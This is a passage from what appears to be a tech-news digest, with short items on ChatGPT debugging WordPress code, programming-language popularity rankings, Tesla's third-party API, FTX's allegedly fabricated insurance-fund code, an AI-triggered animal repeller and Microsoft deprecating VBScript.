ChatGPT took segments of code, analyzed those segments, and provided me with a diagnosis. To be clear, in order for it to make its recommendation, it needed to understand the internals of how WordPress handles hooks (that's what the add_filter function does), and how that functionality translates to the behavior of the calling and the execution of lines of code. I have to mark that achievement as incredible — undeniably 'living in the future' incredible...

As a test, I also tried asking ChatGPT to diagnose my problem in a prompt where I didn't include the handler line, and it wasn't able to help. So, there are very definite limitations to what ChatGPT can do for debugging right now, in 2023...

Could I have fixed the bug on my own? Of course. I've never had a bug I couldn't fix. But whether it would have taken two hours or two days (plus pizza, profanity, and lots of caffeine), while enduring many interruptions, that's something I don't know. I can tell you ChatGPT fixed it in minutes, saving me untold time and frustration.
The article does include a warning. "AI is essentially a black box, you're not able to see what process the AI undertakes to come to its conclusions. As such, you're not really able to check its work... If it turns out there is a problem in the AI-generated code, the cost and time it takes to fix may prove to be far greater than if a human coder had done the full task by hand."

But it also ends with this prediction. "I see a very interesting future, where it will be possible to feed ChatGPT all 153,000 lines of code and ask it to tell you what to fix... I can definitely see a future where programmers can simply ask ChatGPT (or a Microsoft-branded equivalent) to find and fix bugs in entire projects."

"The gap between C# and Java never has been so small," according to October's update for TIOBE's "Programming Community Index".

"Currently, the difference is only 1.2%, and if the trends remain this way, C# will surpass Java in about 2 month's time." Java shows the largest decline of -3.92% and C# the largest gain of +3.29% of all programming languages (annually).

The two languages have always been used in similar domains and thus have been competitors for more than 2 decades now. Java's decline in popularity is mainly caused by Oracle's decision to introduce a paid license model after Java 8. Microsoft took the opposite approach with C#. In the past, C# could only be used as part of commercial tool Visual Studio. Nowadays, C# is free and open source and it's embraced by many developers.

There are also other reasons for Java's decline. First of all, the Java language definition has not changed much the past few years and Kotlin, its fully compatible direct competitor, is easier to use and free of charge.
"Java remains a critical language in enterprise computing," argues InfoWorld, "with Java 21 just released last month and Java 22 due next March. And free open source binaries of Java still are available via OpenJDK." InfoWorld also notes TIOBE's ranking is different than other indexes. TIOBE's top 10:

1. Python (14.82%)
2. C (12.08%)
3. C++ (10.67%)
4. Java (8.92%)
5. C# (7.71%)
6. JavaScript (2.91%)
7. Visual Basic (2.13%)
8. PHP (1.9%)
9. SQL (1.78%)
10. Assembly (1.64%)

And here's the Pypl Popularity of Programming Language (based on searches for language tutorials on Google):

1. Python, with a 28.05% share
2. Java (15.88%)
3. JavaScript (9.27%)
4. C# (6.79%)
5. C/C++ (6.59%)
6. PHP (4.86%)
7. R (4.45%)
8. TypeScript (2.93%)
9. Swift (2.69%)
10. Objective-C (2.29%)

An anonymous reader quotes a report from Electrek: Tesla has officially released its API documentation to support third-party apps -- after years of operating in a gray zone with an unofficial API. For now, it is geared toward fleet management, but developers are hoping it is a first step toward creating a healthy app ecosystem. [...] So far, it still only covers the command that you can send to your car through the Tesla app, and it can ping the data from your car that goes to the app. In short, it is going to make official all the third-party fleet management apps, smartwatch integration apps, etc.

In the documentation, Tesla writes that all third-party apps are going to have to go through the new API starting next year: "Following the release of Tesla Vehicle Command SDK support for REST API vehicle command endpoints is now reaching end of life. Starting 2024 most vehicles will require sending commands via Tesla Vehicle Command SDK." Tesla put together a process to onboard those apps on its website. If you are using some of those apps, you will likely receive a notification to give them official authorization to access car data.

Tom Mitchelhill reports via CoinTelegraph: Crypto exchange FTX used hidden Python code to misrepresent the value of its insurance fund -- a pool of funds meant to prevent user losses during huge liquidation events -- according to testimony from FTX co-founder Gary Wang. In a damning testimony on Oct. 6, FTX's former chief technology officer, Gary Wang, said that FTX's so-called $100 million insurance fund in 2021 was fabricated and never contained any of the exchanges' FTX tokens (FTT) as claimed. Instead, the figure shown to the public was calculated by multiplying the daily trading volume of the FTX Token by a random number close to 7,500.

When the prosecution surfaced the above tweet -- among other public statements of its value -- and asked Wang whether this amount was accurate, he replied with a single word: "No." "For one, there is no FTT in the insurance fund. It's just the USD number. And, two, the number listed here does not match what was in the database." An exhibit in the Oct. 6 trial shows the alleged code used to generate the size of the so-called "Backstop Fund" or public insurance fund.

FTX's insurance fund was designed to protect user losses in case of huge, sudden market movements and its value was often touted on its website and social media. According to Wang's testimony, however, the amount contained within the fund was often insufficient to cover these losses. [...] In addition to revealing the allegedly fraudulent nature of FTX's insurance fund, Wang claimed that Bankman-Fried prompted him and Nishad Singh to implement an "allow_negative" balance feature in the code at FTX, which allowed Alameda Research to trade with near-unlimited liquidity on the crypto exchange.

Tom Singleton reports via the BBC: A man got so fed up with foxes and badgers fouling in his garden that he adapted cameras to help repel them. James Milward linked the Ring cameras at his Surrey home to a device that emits high frequency sounds. He then trained the system using hundreds of images of the nocturnal nuisances so it learned to trigger the noise when it spotted them. Mr Milward said it "sounds crazy" but the gadget he called the Furbinator 3000 has kept his garden clean.

Getting the camera system to understand what it was looking at was not straightforward though. "At first it recognised the badger as an umbrella," he said. "I did some fine tuning and it came out as a sink, or a bear if I was lucky. Pretty much a spectacular failure." He fed in pictures of the animals through an artificial intelligence process called machine learning and finally, the device worked. The camera spotted a badger, and the high frequency sound went off to send the unwanted night-time visitor on its way and leave the garden clean for Mr Milward's children to play in. The code for the Furbinator 3000 is open source, with detailed instructions available in Milward's Medium post.

Thomas Claburn reports via The Register: Microsoft has stopped developing VBScript after a 27-year relationship and plans to remove the scripting language entirely in a future Windows release. The Windows biz said on Monday that VBScript, short for Visual Basic Scripting Edition, has been deprecated in an update to its list of "Deprecated features for Windows client." "VBScript is being deprecated," Microsoft said. "In future releases of Windows, VBScript will be available as a feature on demand before its removal from the operating system."

VBScript debuted in 1996 and its most recent release, version 5.8, dates back to 2010. It is a scripting language, and was for a while widely used among system administrators to automate tasks until it was eclipsed by PowerShell, which debuted in 2006. "Microsoft Visual Basic Scripting Edition brings active scripting to a wide variety of environments, including Web client scripting in Microsoft Internet Explorer and Web server scripting in Microsoft Internet Information Service," Redmond explains in its help documentation. Unfortunately, Microsoft never managed to get other browser makers to support VBScript, so outside of Microsoft-exclusive environments, web developers tended to favor JavaScript for client-side tasks.